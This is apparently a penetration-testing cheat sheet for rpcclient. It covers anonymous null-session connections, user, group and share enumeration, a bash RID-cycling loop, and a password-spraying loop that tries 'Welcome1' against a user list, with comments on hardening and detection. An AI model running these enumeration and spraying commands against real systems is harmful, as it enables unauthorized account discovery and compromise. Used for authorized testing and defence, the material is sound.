rpcclient
# Anonymous (null-session) connection attempts: both lines supply an empty username.
# With -U "" rpcclient still prompts for a password unless -N is also given.
# If either command connects, the server accepts anonymous RPC sessions, which is the
# setting to harden.
rpcclient -U "" 10.129.14.128
# -U takes username%password, so a lone '%' means empty username and empty password.
rpcclient -U'%' 10.10.110.17
# Commands (typed at the rpcclient prompt after connecting, not in the shell)
# List the domain's users; each entry is printed with its RID in hex (0x...)
enumdomusers
# Pass one of the hex RIDs printed by enumdomusers to queryuser for that account's details
queryuser <RID>
# 0x3e9 is RID 1001
queryuser 0x3e9
# Group lookup by RID; 0x201 is RID 513 (the well-known Domain Users RID in AD domains)
querygroup 0x201
# RID cycling over an anonymous session: asks the server for every RID from
# 500 to 1100 (one rpcclient connection per RID) and prints the user name,
# user_rid and group_rid of each RID that resolves, followed by a blank line.
# Defensive note: this only returns data when the server permits anonymous
# SAM queries; a single source opening hundreds of anonymous sessions in a
# row is the pattern to alert on.
for ((rid = 500; rid <= 1100; rid++)); do
  if rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x' "$rid")" \
    | grep "User Name\|user_rid\|group_rid"; then
    echo ""
  fi
done
# Server information (rpcclient prompt commands)
srvinfo
# Enumerate the domains known to the server
enumdomains
# Query information about the domain
querydominfo
# Enumerate all shares on the server
netshareenumall
# Get details for a single share; replace <share> with a name from netshareenumall
netsharegetinfo <share>
# Lists the domain's usernames, each with its RID (rpcclient prompt command)
enumdomusers
# Tries one password (Welcome1) for every name in valid_users.txt; grep keeps
# only the output line containing "Authority", which getusername prints once
# a login has succeeded.
# Defensive note: the server sees one authentication attempt per account from
# the same source in a short window, most of them failures; alert on that
# breadth across accounts rather than on per-account failure counts. The
# password is passed on the command line, so it is also visible in the
# process list and shell history of the machine running the loop.
for user in $(cat valid_users.txt); do
  rpcclient -U "${user}%Welcome1" -c "getusername;quit" 172.16.5.5 \
    | grep Authority
done